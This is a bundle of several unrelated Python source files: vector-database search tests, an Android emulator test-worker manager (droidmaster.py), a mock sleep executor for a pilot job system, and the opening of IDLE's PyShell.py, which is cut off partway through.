def test_search_collection_multiple_times(self):
"""
target: test search for multiple times
method: search for multiple times
expected: searched successfully
"""
log.info("Test case of search interface: test_search_collection_multiple_times")
# 1. initialize with data
search_num = 5
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True)
# 2. search for multiple times
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
for i in range(search_num):
log.info("test_search_collection_multiple_times: searching round %d" % (i+1))
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L1)
def test_search_index_one_partition(self):
"""
target: test search from partition
method: search from one partition
expected: searched successfully
"""
log.info("Test case of search interface: test_search_index_one_partition")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, partition_num=1)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 3. search in one partition
log.info("test_search_index_one_partition: searching (1000 entities) through one partition")
limit = 1000
par = collection_w.partitions
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, limit, default_search_exp,
[par[1].name],
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids[par[0].num_entities:],
"limit": par[1].num_entities})
@pytest.mark.tags(CaseLabel.L1)
def test_search_index_partitions(self):
"""
target: test search from partitions
        method: search from multiple partitions
expected: searched successfully
"""
log.info("Test case of search interface: test_search_index_partitions")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, partition_num=1)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 3. search through partitions
log.info("test_search_index_partitions: searching (1000 entities) through partitions")
par = collection_w.partitions
log.info("test_search_index_partitions: partitions: %s" % par)
limit = 1000
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, limit, default_search_exp,
[par[0].name, par[1].name],
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": limit})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("partition_names",
[["(.*)"], ["search(.*)"]])
def test_search_index_partitions_fuzzy(self, partition_names):
"""
target: test search from partitions
method: search from partitions with fuzzy
partition name
expected: searched successfully
"""
log.info("Test case of search interface: test_search_index_partitions_fuzzy")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, partition_num=1)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 3. search through partitions
log.info("test_search_index_partitions_fuzzy: searching through partitions")
limit = 1000
nb = default_nb
par = collection_w.partitions
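        # the fuzzy pattern "search(.*)" is expected to match only the second
        # (non-default) partition, so narrow the expected ids and limit to it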
if partition_names == ["search(.*)"]:
insert_ids = insert_ids[par[0].num_entities:]
limit = par[1].num_entities
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, limit, default_search_exp,
partition_names,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": limit})
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partition_empty(self):
"""
target: test search the empty partition
method: search from the empty partition
expected: searched successfully with 0 results
"""
log.info("Test case of search interface: test_search_index_partition_empty")
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
# 2. create empty partition
partition_name = "search_partition_empty"
collection_w.create_partition(partition_name=partition_name, description="search partition empty")
par = collection_w.partitions
log.info("test_search_index_partition_empty: partitions: %s" % par)
collection_w.load()
# 3. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 4. search the empty partition
log.info("test_search_index_partition_empty: searching %s entities through empty partition" % default_limit)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, [partition_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": [],
"limit": 0})
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_jaccard_flat_index(self):
"""
target: search binary_collection, and check the result: distance
        method: compare the returned distance with the value computed with JACCARD
        expected: the returned distance equals the computed value
"""
log.info("Test case of search interface: test_search_binary_jaccard_flat_index")
# 1. initialize with binary data
collection_w, _, binary_raw_vector, _ = \
self.init_collection_general(prefix, True, 2, is_binary=True)
# 2. create index
default_index = {"index_type": "BIN_IVF_FLAT", "params": {"nlist": 128}, "metric_type": "JACCARD"}
collection_w.create_index("binary_vector", default_index)
# 3. compute the distance
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, default_dim)
distance_0 = cf.jaccard(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.jaccard(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "JACCARD", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:default_nq], "binary_vector",
search_params, default_limit, "int64 >= 0")[0]
assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_hamming_flat_index(self):
"""
target: search binary_collection, and check the result: distance
        method: compare the returned distance with the value computed with HAMMING
        expected: the returned distance equals the computed value
"""
log.info("Test case of search interface: test_search_binary_hamming_flat_index")
# 1. initialize with binary data
collection_w, _, binary_raw_vector, _ = \
self.init_collection_general(prefix, True, 2, is_binary=True)
# 2. create index
default_index = {"index_type": "BIN_IVF_FLAT", "params": {"nlist": 128}, "metric_type": "HAMMING"}
collection_w.create_index("binary_vector", default_index)
# 3. compute the distance
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, default_dim)
distance_0 = cf.hamming(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.hamming(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "HAMMING", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:default_nq], "binary_vector",
search_params, default_limit, "int64 >= 0")[0]
assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_tanimoto_flat_index(self):
"""
target: search binary_collection, and check the result: distance
        method: compare the returned distance with the value computed with TANIMOTO
        expected: the returned distance equals the computed value
"""
# 1. initialize with binary data
collection_w, _, binary_raw_vector, _ = \
self.init_collection_general(prefix, True, 2, is_binary=True)
# 2. create index
default_index = {"index_type": "BIN_IVF_FLAT", "params": {"nlist": 128}, "metric_type": "TANIMOTO"}
collection_w.create_index("binary_vector", default_index)
# 3. compute the distance
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, default_dim)
distance_0 = cf.tanimoto(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.tanimoto(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "TANIMOTO", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:default_nq], "binary_vector",
search_params, default_limit, "int64 >= 0")[0]
assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("expression, limit",
zip(cf.gen_normal_expressions(),
[1000, 999, 898, 997, 2, 3]))
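    # each expected limit is the number of the 1000 inserted entities that
    # should satisfy the corresponding generated expression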
def test_search_with_expression(self, expression, limit):
"""
target: test search with different expressions
method: test search with different expressions
expected: searched successfully with correct limit(topK)
"""
log.info("Test case of search interface: test_search_with_expression")
# 1. initialize with data
nb = 1000
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb)
# 2. create index
index_param = {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}}
collection_w.create_index("float_vector", index_param)
# 3. search with different expressions
log.info("test_search_with_expression: searching with expression: %s" % expression)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, nb, expression,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": limit})
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_output_fields_empty(self):
"""
target: test search with output fields
method: search with empty output_field
expected: search success
"""
log.info("Test case of search interface: test_search_with_output_fields_empty")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True)
# 2. search
log.info("test_search_with_output_fields_empty: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
res = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=[],
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})[0]
assert len(res[0][0].entity._row_data) == 0
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_output_fields_not_exist(self):
"""
target: test search with output fields
method: search with non-exist output_field
expected: search success
"""
log.info("Test case of search interface: test_search_with_output_fields_not_exist")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True)
# 2. search
log.info("test_search_with_output_fields_not_exist: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=["int63"],
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: 'Field int63 not exist'})
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_output_field(self):
"""
target: test search with output fields
method: search with one output_field
expected: search success
"""
log.info("Test case of search interface: test_search_with_output_field")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True)
# 2. search
log.info("test_search_with_output_field: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
res = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=[default_int64_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})[0]
assert len(res[0][0].entity._row_data) != 0
assert default_int64_field_name in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields(self):
"""
target: test search with output fields
method: search with multiple output_field
expected: search success
"""
log.info("Test case of search interface: test_search_with_output_fields")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, is_all_data_type=True)
# 2. search
log.info("test_search_with_output_fields: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
res = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
output_fields=[default_int64_field_name,
default_float_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})[0]
assert len(res[0][0].entity._row_data) != 0
        assert default_int64_field_name in res[0][0].entity._row_data
        assert default_float_field_name in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_expression_all_data_type(self):
"""
target: test search using different supported data type
method: search using different supported data type
expected: search success
"""
log.info("Test case of search interface: test_search_expression_all_data_type")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, is_all_data_type=True)
# 2. search
log.info("test_search_expression_all_data_type: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
search_exp = "int64 >= 0 && int32 >= 0 && int16 >= 0 " \
"&& int8 >= 0 && float >= 0 && double >= 0"
res = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, search_exp,
output_fields=[default_int64_field_name,
default_float_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})[0]
assert len(res[0][0].entity._row_data) != 0
        assert default_int64_field_name in res[0][0].entity._row_data
        assert default_float_field_name in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_multi_collections(self):
"""
        target: test search over multiple collections with L2
        method: add vectors into 10 collections, and search
        expected: search status ok and correct result length for each collection
"""
log.info("Test case of search interface: test_search_multi_collections")
self._connect()
collection_num = 10
for i in range(collection_num):
# 1. initialize with data
log.info("test_search_multi_collections: search round %d" % (i + 1))
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True)
# 2. search
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
log.info("test_search_multi_collections: searching %s entities (nq = %s) from collection %s" %
(default_limit, default_nq, collection_w.name))
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L2)
def test_search_concurrent_multi_threads(self):
"""
        target: test concurrent search with multiple threads
        method: search with 10 threads that share one collection connection
        expected: status ok and correct search results in every thread
"""
log.info("Test case of search interface: test_search_concurrent_multi_threads")
threads_num = 10
threads = []
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True)
def search(collection_w):
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})
        # 2. search with multiple threads
        log.info("test_search_concurrent_multi_threads: searching with %s threads" % threads_num)
for i in range(threads_num):
t = threading.Thread(target=search, args=(collection_w,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
log.info("test_search_concurrent_multi_threads: searched with %s processes" % threads_num)
|
droidmaster.py
|
# This file contains the main class of droidmaster
# It can be used after the AVD has started, the app has been installed, and adb has been set up properly
# By configuring and creating a DroidMaster instance,
# it will spawn droidbot workers that interact with Android in the AVD like a human
import logging
import os
import sys
import pkg_resources
import shutil
import subprocess
import xmlrpclib
from threading import Timer
from SimpleXMLRPCServer import SimpleXMLRPCServer
from device import Device
from adapter.droidbot import DroidBotConn
from adapter.qemu import QEMUConn
from app import App
from env_manager import AppEnvManager
from input_manager import InputManager
class DroidMaster(object):
"""
The main class of droidmaster
DroidMaster currently supports QEMU instance pool only
"""
# this is a single instance class
instance = None
def __init__(self,
app_path=None,
device_serial=None,
is_emulator=False,
output_dir=None,
env_policy=None,
policy_name=None,
random_input=False,
script_path=None,
event_count=None,
event_interval=None,
timeout=None,
keep_app=None,
keep_env=False,
cv_mode=False,
debug_mode=False,
profiling_method=None,
grant_perm=False,
enable_accessibility_hard=False,
qemu_hda=None,
qemu_no_graphic=False):
"""
        initiate DroidMaster and store the configuration
        used to initiate its droidbot workers
:return:
"""
logging.basicConfig(level=logging.DEBUG if debug_mode else logging.INFO)
self.logger = logging.getLogger('DroidMaster')
DroidMaster.instance = self
# 1. Save DroidBot Parameters
self.app_path=app_path
self.device_serial=device_serial
self.is_emulator=is_emulator
self.output_dir=output_dir
os.makedirs(self.output_dir)
self.env_policy=env_policy
self.policy_name=policy_name
self.random_input=random_input
self.script_path=script_path
self.event_count=event_count
self.event_interval=event_interval
self.timeout=timeout
self.keep_app=keep_app
self.keep_env=keep_env
self.cv_mode=cv_mode
self.debug_mode=debug_mode
self.profiling_method=profiling_method
self.grant_perm=grant_perm
self.enable_accessibility_hard=enable_accessibility_hard
# 2. Initiate Device Pool
# {"adb_target": {"pid": pid, }}
self.domain = "localhost"
self.adb_default_port = 4444
self.qemu_default_port = 5555
self.rpc_port = 6666
self.qemu_hda = qemu_hda
self.qemu_no_graphic = qemu_no_graphic
self.device_pool_capacity = 6
self.device_pool = {}
self.device_unique_id = 0
for port_offset in range(self.device_pool_capacity):
adb_port = self.adb_default_port + port_offset
adb_target = "%s:%s" % (self.domain, adb_port)
qemu_port = self.qemu_default_port + port_offset
self.device_pool[adb_target] = {
"domain": self.domain,
"adb_port": adb_port,
"qemu_port": qemu_port,
# droidbot is indexed by adb_target
# qemu is indexed by droidbot
"droidbot": None,
"qemu": None,
"id": None
}
self.logger.info(self.device_pool)
        # 3. This Server's Parameters
self.timer = None
self.enabled = True
self.successful_spawn_events = set()
@staticmethod
def get_instance():
if DroidMaster.instance is None:
print "Error: DroidMaster is not initiated!"
sys.exit(-1)
return DroidMaster.instance
def get_available_devices(self):
return sorted([self.device_pool[x]
for x in self.device_pool
if self.device_pool[x]["qemu"] is None])
def get_running_devices(self):
return sorted([self.device_pool[x]
for x in self.device_pool
if self.device_pool[x]["qemu"] is not None])
def start_device(self, device, hda_path, from_snapshot=False, init_script_path=None):
# 1. get device ID
device["id"] = self.device_unique_id
# 2. new QEMU adapter
device["qemu"] = QEMUConn(hda_path, device["qemu_port"], device["adb_port"],
self.qemu_no_graphic)
device["qemu"].set_up()
device["qemu"].connect(from_snapshot)
# 3. new DroidWorker adapter
script_path = init_script_path if init_script_path else self.script_path
device["droidbot"] = DroidBotConn(device["id"],
app_path=self.app_path,
device_serial="%s:%d" % \
(self.domain, device["adb_port"]),
is_emulator=self.is_emulator,
output_dir=self.output_dir,
env_policy=self.env_policy,
policy_name=self.policy_name,
random_input=self.random_input,
script_path=script_path,
event_count=self.event_count,
event_interval=self.event_interval,
timeout=self.timeout,
keep_app=self.keep_app,
keep_env=self.keep_env,
cv_mode=self.cv_mode,
debug_mode=self.debug_mode,
profiling_method=self.profiling_method,
grant_perm=self.grant_perm,
enable_accessibility_hard=self.enable_accessibility_hard,
master="http://%s:%d/" % \
(self.domain, self.rpc_port))
device["droidbot"].set_up()
self.logger.info("Worker: DOMAIN[%s], ADB[%s], QEMU[%d], ID[%d]" % \
(device["domain"], device["adb_port"],
device["qemu_port"], device["id"]))
self.device_unique_id += 1
def stop_device(self, device):
device["droidbot"].tear_down()
device["droidbot"].disconnect()
device["droidbot"] = None
device["qemu"].disconnect()
device["qemu"].tear_down()
device["qemu"] = None
def spawn(self, adb_target, init_script_json):
"""
A worker requests to spawn a new worker
based on its current state
"""
if init_script_json in self.successful_spawn_events:
self.logger.warning("Event spawned already")
return False
device = self.device_pool[adb_target]
device["qemu"].send_command("stop")
device["qemu"].send_command("savevm spawn")
# copy qemu image file (almost RAM image size only)
new_hda_path = "%s.%d" % (device["qemu"].hda_path, \
self.device_unique_id)
shutil.copyfile(device["qemu"].hda_path, new_hda_path)
# prepare init script file
import json
init_script_path = "%s%s%d.json" % (self.output_dir, os.path.sep,
self.device_unique_id)
with open(init_script_path, "w") as init_script_file:
init_script_file.write(init_script_json)
available_devices = self.get_available_devices()
if not len(available_devices):
self.logger.warning("No available device slot")
return False
self.start_device(available_devices[0], new_hda_path,
from_snapshot=True, init_script_path=init_script_path)
device["qemu"].send_command("delvm spawn")
device["qemu"].send_command("cont")
self.successful_spawn_events.add(init_script_json)
self.logger.info("Spawning worker")
return True
def start_worker(self):
"""
Start the first worker, used by DroidMaster itself
"""
# copy qemu image file
new_hda_path = "%s.%d" % (self.qemu_hda, \
self.device_unique_id)
# generate incremental snapshot only
p = subprocess.Popen(["qemu-img", "create", "-f", "qcow2", new_hda_path,
"-o", "backing_file=%s" % self.qemu_hda, "8G"])
p.wait()
available_devices = self.get_available_devices()
if not len(available_devices):
self.logger.warning("No available device slot")
return False
self.start_device(available_devices[0], new_hda_path)
return True
def start_daemon(self):
self.server = SimpleXMLRPCServer((self.domain, self.rpc_port))
print "Listening on port %s..." % self.rpc_port
self.server.register_function(self.spawn, "spawn")
self.server.register_function(self.start_worker, "start_worker")
self.server.serve_forever()
def stop_daemon(self):
print "Shutting down DroidMaster server..."
self.server.shutdown()
self.server_thread.join(0)
def start(self):
"""
start interacting
:return:
"""
if not self.enabled:
return
self.logger.info("Starting DroidMaster")
try:
if self.timeout > 0:
self.timer = Timer(self.timeout, self.stop)
self.timer.start()
if not self.enabled:
return
            # start the RPC server that listens for worker requests
import time
import threading
self.server_thread = threading.Thread(target=self.start_daemon)
self.server_thread.daemon = True
self.server_thread.start()
time.sleep(1) # wait server to start
# create first droidbot instance
proxy = xmlrpclib.ServerProxy("http://%s:%d/" % (self.domain, self.rpc_port))
proxy.start_worker()
while len(self.get_running_devices()):
time.sleep(1)
except KeyboardInterrupt:
self.logger.info("Keyboard interrupt.")
pass
except Exception as e:
self.logger.warning("Something went wrong: " + e.message)
import traceback
traceback.print_exc()
self.stop()
sys.exit(-1)
self.stop()
self.logger.info("DroidMaster Stopped")
def stop(self):
self.enabled = False
if self.timer and self.timer.isAlive():
self.timer.cancel()
# stop listening server
self.stop_daemon()
# stop all workers
running_devices = self.get_running_devices()
for device in running_devices:
self.stop_device(device)
class DroidMasterException(Exception):
pass
|
sleep.py
|
__copyright__ = "Copyright 2013-2016, http://radical.rutgers.edu"
__license__ = "MIT"
import os
import time
import threading as mt
import radical.utils as ru
from ... import states as rps
from ... import constants as rpc
from .base import AgentExecutingComponent
# ------------------------------------------------------------------------------
#
class Sleep(AgentExecutingComponent) :
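    """
    A mock executing component: instead of launching any process it treats a
    task's first argument as a sleep duration and lets a watcher thread mark
    the task DONE once that duration has elapsed.
    """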
# --------------------------------------------------------------------------
#
def __init__(self, cfg, session):
AgentExecutingComponent.__init__ (self, cfg, session)
# --------------------------------------------------------------------------
#
def initialize(self):
self._pwd = os.getcwd()
self.register_input(rps.AGENT_EXECUTING_PENDING,
rpc.AGENT_EXECUTING_QUEUE, self.work)
self.register_output(rps.AGENT_STAGING_OUTPUT_PENDING,
rpc.AGENT_STAGING_OUTPUT_QUEUE)
self.register_publisher (rpc.AGENT_UNSCHEDULE_PUBSUB)
self._terminate = mt.Event()
self._tasks_lock = ru.RLock()
self._tasks = list()
self._delay = 0.1
self._watcher = mt.Thread(target=self._timed)
self._watcher.daemon = True
self._watcher.start()
# --------------------------------------------------------------------------
#
def finalize(self):
self._terminate.set()
self._watcher.join()
# --------------------------------------------------------------------------
#
def work(self, tasks):
self.advance(tasks, rps.AGENT_EXECUTING, publish=True, push=False)
for task in tasks:
try:
self._handle_task(task)
except Exception:
# append the startup error to the tasks stderr. This is
# not completely correct (as this text is not produced
# by the task), but it seems the most intuitive way to
# communicate that error to the application/user.
self._log.exception("error running Task")
if task['stderr'] is None:
task['stderr'] = ''
task['stderr'] += '\nPilot cannot start task:\n'
task['stderr'] += '\n'.join(ru.get_exception_trace())
# can't rely on the executor base to free the task resources
self._prof.prof('unschedule_start', uid=task['uid'])
self.publish(rpc.AGENT_UNSCHEDULE_PUBSUB, task)
self.advance(task, rps.FAILED, publish=True, push=False)
with self._tasks_lock:
self._tasks.extend(tasks)
# --------------------------------------------------------------------------
#
def _handle_task(self, task):
now = time.time()
# assert(t['description']['executable'].endswith('sleep'))
task['to_finish'] = now + float(task['description']['arguments'][0])
uid = task['uid']
self._prof.prof('exec_start', uid=uid)
self._prof.prof('exec_ok', uid=uid)
self._prof.prof('task_start', uid=uid)
self._prof.prof('task_exec_start', uid=uid)
self._prof.prof('app_start', uid=uid)
# --------------------------------------------------------------------------
#
def _timed(self):
while not self._terminate.is_set():
time.sleep(self._delay)
with self._tasks_lock:
now = time.time()
to_finish = [t for t in self._tasks if t['to_finish'] <= now]
self._tasks = [t for t in self._tasks if t['to_finish'] > now]
for task in to_finish:
uid = task['uid']
task['target_state'] = 'DONE'
self._prof.prof('app_stop', uid=uid)
self._prof.prof('task_exec_stop', uid=uid)
self._prof.prof('task_stop', uid=uid)
self._prof.prof('exec_stop', uid=uid)
self._prof.prof('unschedule_start', uid=uid)
self.publish(rpc.AGENT_UNSCHEDULE_PUBSUB, task)
self.advance(to_finish, rps.AGENT_STAGING_OUTPUT_PENDING,
publish=True, push=True)
# ------------------------------------------------------------------------------
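# A minimal standalone sketch of the deadline pattern used above (illustrative
# only): _handle_task() records a wall-clock deadline per task, and the watcher
# thread repeatedly splits the list into finished and still-"running" tasks.
#
#   import time
#   pending = [{'uid': 'task.0001', 'to_finish': time.time() + 1.0}]
#   while pending:
#       time.sleep(0.1)
#       now     = time.time()
#       done    = [t for t in pending if t['to_finish'] <= now]
#       pending = [t for t in pending if t['to_finish'] >  now]
#       for t in done:
#           print('finished %s' % t['uid'])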
|
PyShell.py
|
#! /usr/bin/env python
import os
import os.path
import sys
import string
import getopt
import re
import socket
import time
import threading
import traceback
import types
import macosxSupport
import linecache
from code import InteractiveInterpreter
try:
from Tkinter import *
except ImportError:
print>>sys.__stderr__, "** IDLE can't import Tkinter. " \
"Your Python may not be configured for Tk. **"
sys.exit(1)
import tkMessageBox
from EditorWindow import EditorWindow, fixwordbreaks
from FileList import FileList
from ColorDelegator import ColorDelegator
from UndoDelegator import UndoDelegator
from OutputWindow import OutputWindow
from configHandler import idleConf
import idlever
import rpc
import Debugger
import RemoteDebugger
IDENTCHARS = string.ascii_letters + string.digits + "_"
LOCALHOST = '127.0.0.1'
try:
from signal import SIGTERM
except ImportError:
SIGTERM = 15
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
global warning_stream
warning_stream = sys.__stderr__
try:
import warnings
except ImportError:
pass
else:
def idle_showwarning(message, category, filename, lineno):
file = warning_stream
try:
file.write(warnings.formatwarning(message, category, filename, lineno))
except IOError:
pass ## file (probably __stderr__) is invalid, warning dropped.
warnings.showwarning = idle_showwarning
def idle_formatwarning(message, category, filename, lineno):
"""Format warnings the IDLE way"""
s = "\nWarning (from warnings module):\n"
s += ' File \"%s\", line %s\n' % (filename, lineno)
line = linecache.getline(filename, lineno).strip()
if line:
s += " %s\n" % line
s += "%s: %s\n>>> " % (category.__name__, message)
return s
warnings.formatwarning = idle_formatwarning
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(which destroys them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for filename in cache.keys():
if filename[:1] + filename[-1:] == '<>':
save[filename] = cache[filename]
orig_checkcache()
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
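# The default-argument trick above is a general monkey-patching pattern: the
# original callable is captured when the wrapper is *defined*, so the wrapper
# still reaches the real implementation after the module attribute is rebound.
# A minimal sketch of the same idea (illustrative only, not used by IDLE):
#
#   def counted_getline(filename, lineno, orig_getline=linecache.getline):
#       counted_getline.calls = getattr(counted_getline, 'calls', 0) + 1
#       return orig_getline(filename, lineno)
#   linecache.getline = counted_getline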
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(),
'breakpoints.lst')
# whenever a file is changed, restore breakpoints
if self.io.filename: self.restore_file_breaks()
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
rmenu_specs = [("Set Breakpoint", "<<set-breakpoint-here>>"),
("Clear Breakpoint", "<<clear-breakpoint-here>>")]
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
i = self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text. Certain
# kinds of edits cause these ranges to be deleted: Inserting
# or deleting a line just before a breakpoint, and certain
# deletions prior to a breakpoint. These issues need to be
# investigated and understood. It's not clear if they are
# Tk issues or IDLE issues, or whether they can actually
# be fixed. Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
